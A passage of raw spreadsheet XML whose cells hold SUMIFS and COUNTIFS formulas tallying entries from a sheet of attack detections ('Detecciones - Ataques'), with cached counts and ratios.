        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,M8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; M8 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="N11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,N8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; N8 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="O11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,O8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; O8 &amp; "*") </f>
        <v>8</v>
      </c>
      <c r="P11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,P8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; P8 &amp; "*") </f>
        <v>6</v>
      </c>
      <c r="Q11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Q8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Q8 &amp; "*") </f>
        <v>11</v>
      </c>
      <c r="R11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,R8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; R8 &amp; "*") </f>
        <v>5</v>
      </c>
      <c r="S11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S8 &amp; "*") </f>
        <v>167</v>
      </c>
      <c r="T11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T8 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL3:$IL139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U8) + SUMIFS('(B) - Detecciones - Ataques'!$HM3:$HM139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U8 &amp; "*") </f>
        <v>563</v>
      </c>
      <c r="W11" s="505" t="s">
        <v>2661</v>
      </c>
      <c r="X11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,X8)</f>
        <v>582</v>
      </c>
      <c r="Y11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Y8)</f>
        <v>1</v>
      </c>
      <c r="Z11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,Z8)</f>
        <v>0</v>
      </c>
      <c r="AA11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AA8)</f>
        <v>0</v>
      </c>
      <c r="AB11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AB8)</f>
        <v>6949</v>
      </c>
      <c r="AC11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AC8)</f>
        <v>0</v>
      </c>
      <c r="AD11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AD8)</f>
        <v>0</v>
      </c>
      <c r="AE11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AE8)</f>
        <v>0</v>
      </c>
      <c r="AF11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AF8)</f>
        <v>112</v>
      </c>
      <c r="AG11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AG8)</f>
        <v>3</v>
      </c>
      <c r="AH11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AH8)</f>
        <v>0</v>
      </c>
      <c r="AI11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI8)</f>
        <v>0</v>
      </c>
      <c r="AJ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ8)</f>
        <v>2</v>
      </c>
      <c r="AK11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK8)</f>
        <v>0</v>
      </c>
      <c r="AL11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL8)</f>
        <v>0</v>
      </c>
      <c r="AM11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM8)</f>
        <v>0</v>
      </c>
      <c r="AN11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN8)</f>
        <v>0</v>
      </c>
      <c r="AO11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO8)</f>
        <v>2</v>
      </c>
      <c r="AP11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP8)</f>
        <v>0</v>
      </c>
      <c r="AQ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ8)</f>
        <v>0</v>
      </c>
      <c r="AR11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR8)</f>
        <v>2</v>
      </c>
      <c r="AS11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS8)</f>
        <v>0</v>
      </c>
      <c r="AT11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT8)</f>
        <v>0</v>
      </c>
      <c r="AU11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU8)</f>
        <v>2</v>
      </c>
      <c r="AV11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV8)</f>
        <v>1</v>
      </c>
      <c r="AW11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW8)</f>
        <v>0</v>
      </c>
      <c r="AX11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX8)</f>
        <v>0</v>
      </c>
      <c r="AY11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY8)</f>
        <v>0</v>
      </c>
      <c r="AZ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ8)</f>
        <v>0</v>
      </c>
      <c r="BA11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA8)</f>
        <v>0</v>
      </c>
      <c r="BB11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB8)</f>
        <v>4</v>
      </c>
      <c r="BC11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC8)</f>
        <v>4</v>
      </c>
      <c r="BD11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD8)</f>
        <v>0</v>
      </c>
      <c r="BE11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE8)</f>
        <v>0</v>
      </c>
      <c r="BF11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF8)</f>
        <v>1</v>
      </c>
      <c r="BG11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG8)</f>
        <v>0</v>
      </c>
      <c r="BH11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH8)</f>
        <v>0</v>
      </c>
      <c r="BI11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI8)</f>
        <v>0</v>
      </c>
      <c r="BJ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ8)</f>
        <v>0</v>
      </c>
      <c r="BK11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK8)</f>
        <v>0</v>
      </c>
      <c r="BL11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL8)</f>
        <v>1</v>
      </c>
      <c r="BM11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM8)</f>
        <v>0</v>
      </c>
      <c r="BN11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN8)</f>
        <v>0</v>
      </c>
      <c r="BO11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO8)</f>
        <v>0</v>
      </c>
      <c r="BP11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP8)</f>
        <v>0</v>
      </c>
      <c r="BQ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ8)</f>
        <v>1</v>
      </c>
      <c r="BR11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR8)</f>
        <v>0</v>
      </c>
      <c r="BS11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS8)</f>
        <v>1</v>
      </c>
      <c r="BT11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT8)</f>
        <v>0</v>
      </c>
      <c r="BU11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU8)</f>
        <v>0</v>
      </c>
      <c r="BV11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV8)</f>
        <v>0</v>
      </c>
      <c r="BW11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW8)</f>
        <v>0</v>
      </c>
      <c r="BX11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX8)</f>
        <v>1</v>
      </c>
      <c r="BY11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY8)</f>
        <v>0</v>
      </c>
      <c r="BZ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ8)</f>
        <v>1</v>
      </c>
      <c r="CA11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA8)</f>
        <v>0</v>
      </c>
      <c r="CB11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB8)</f>
        <v>1</v>
      </c>
      <c r="CC11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC8)</f>
        <v>1</v>
      </c>
      <c r="CD11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD8)</f>
        <v>3</v>
      </c>
      <c r="CE11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE8)</f>
        <v>0</v>
      </c>
      <c r="CF11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF8)</f>
        <v>1</v>
      </c>
      <c r="CG11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG8)</f>
        <v>0</v>
      </c>
      <c r="CH11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH8)</f>
        <v>167</v>
      </c>
      <c r="CI11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI8)</f>
        <v>0</v>
      </c>
      <c r="CJ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ8)</f>
        <v>0</v>
      </c>
      <c r="CK11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK8)</f>
        <v>0</v>
      </c>
      <c r="CL11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL8)</f>
        <v>0</v>
      </c>
      <c r="CM11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM8)</f>
        <v>0</v>
      </c>
      <c r="CN11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN8)</f>
        <v>0</v>
      </c>
      <c r="CO11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO8)</f>
        <v>0</v>
      </c>
      <c r="CP11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP8)</f>
        <v>0</v>
      </c>
      <c r="CQ11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ8)</f>
        <v>0</v>
      </c>
      <c r="CR11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR8)</f>
        <v>0</v>
      </c>
      <c r="CS11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS8)</f>
        <v>0</v>
      </c>
      <c r="CT11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT8)</f>
        <v>0</v>
      </c>
      <c r="CU11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU8)</f>
        <v>0</v>
      </c>
      <c r="CV11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV8)</f>
        <v>0</v>
      </c>
      <c r="CW11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW8)</f>
        <v>450</v>
      </c>
      <c r="CX11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX8)</f>
        <v>112</v>
      </c>
      <c r="CY11" s="624">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$IL$3:$IL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY8)</f>
        <v>1</v>
      </c>
      <c r="CZ11" s="173"/>
      <c r="DA11" s="173"/>
      <c r="DB11" s="173"/>
      <c r="DC11" s="173"/>
      <c r="DD11" s="616" t="s">
        <v>951</v>
      </c>
      <c r="DE11" s="726">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$HW$3:$HW$139,'(B) - Detecciones - Ataques'!$B$3:$B$139,DD11,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔")</f>
        <v>36</v>
      </c>
      <c r="DF11" s="719">
        <v>27.0</v>
      </c>
      <c r="DG11" s="337">
        <f t="shared" si="1"/>
        <v>0.75</v>
      </c>
      <c r="DH11" s="719">
        <f t="shared" si="2"/>
        <v>9</v>
      </c>
      <c r="DI11" s="720">
        <f t="shared" si="3"/>
        <v>0.25</v>
      </c>
      <c r="DJ11" s="719">
        <v>1.0</v>
      </c>
      <c r="DK11" s="20">
        <v>0.0</v>
      </c>
      <c r="DL11" s="20">
        <v>0.0</v>
      </c>
      <c r="DM11" s="20">
        <v>30.0</v>
      </c>
      <c r="DN11" s="336">
        <f t="shared" si="4"/>
        <v>0.8333333333</v>
      </c>
      <c r="DO11" s="336">
        <f t="shared" si="5"/>
        <v>0.1666666667</v>
      </c>
      <c r="DP11" s="721">
        <f t="shared" si="6"/>
        <v>28</v>
      </c>
      <c r="DR11" s="610"/>
      <c r="DS11" s="610"/>
      <c r="DT11" s="619" t="s">
        <v>951</v>
      </c>
      <c r="DU11" s="612">
        <f>DF11/'(D) - Análisis Resultados I - S'!EB30</f>
        <v>3.375</v>
      </c>
      <c r="DV11" s="173"/>
      <c r="DW11" s="619" t="s">
        <v>951</v>
      </c>
      <c r="DX11" s="612">
        <f t="shared" si="7"/>
        <v>0.75</v>
      </c>
      <c r="DY11" s="722">
        <v>0.75</v>
      </c>
      <c r="DZ11" s="722"/>
      <c r="EA11" s="722"/>
      <c r="EE11" s="173"/>
      <c r="EF11" s="173"/>
      <c r="EG11" s="173"/>
      <c r="EH11" s="173"/>
      <c r="EI11" s="173"/>
      <c r="EJ11" s="173"/>
      <c r="EK11" s="173"/>
      <c r="EL11" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP3&lt;&gt;0,'(B) - Detecciones - Ataques'!IP3*'(B) - Detecciones - Ataques'!IL3/('(B) - Detecciones - Ataques'!IL3+'(B) - Detecciones - Ataques'!IN3),0)</f>
        <v>0</v>
      </c>
      <c r="EM11" s="626">
        <f>IF('(B) - Detecciones - Ataques'!IP3&lt;&gt;0,'(B) - Detecciones - Ataques'!IP3*'(B) - Detecciones - Ataques'!IN3/('(B) - Detecciones - Ataques'!IL3+'(B) - Detecciones - Ataques'!IN3),0)</f>
        <v>0</v>
      </c>
      <c r="EN11" s="626"/>
      <c r="EO11" s="626"/>
      <c r="EP11" s="729"/>
      <c r="EQ11" s="730"/>
      <c r="ER11" s="731" t="s">
        <v>2013</v>
      </c>
      <c r="ES11" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$B$3:$B$139,$ER11)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$IM$3:$IM$139,"&lt;&gt;0",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER11 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="ET11" s="724">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,ER11)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; ER11 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="EU11" s="728">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="EV11" s="730"/>
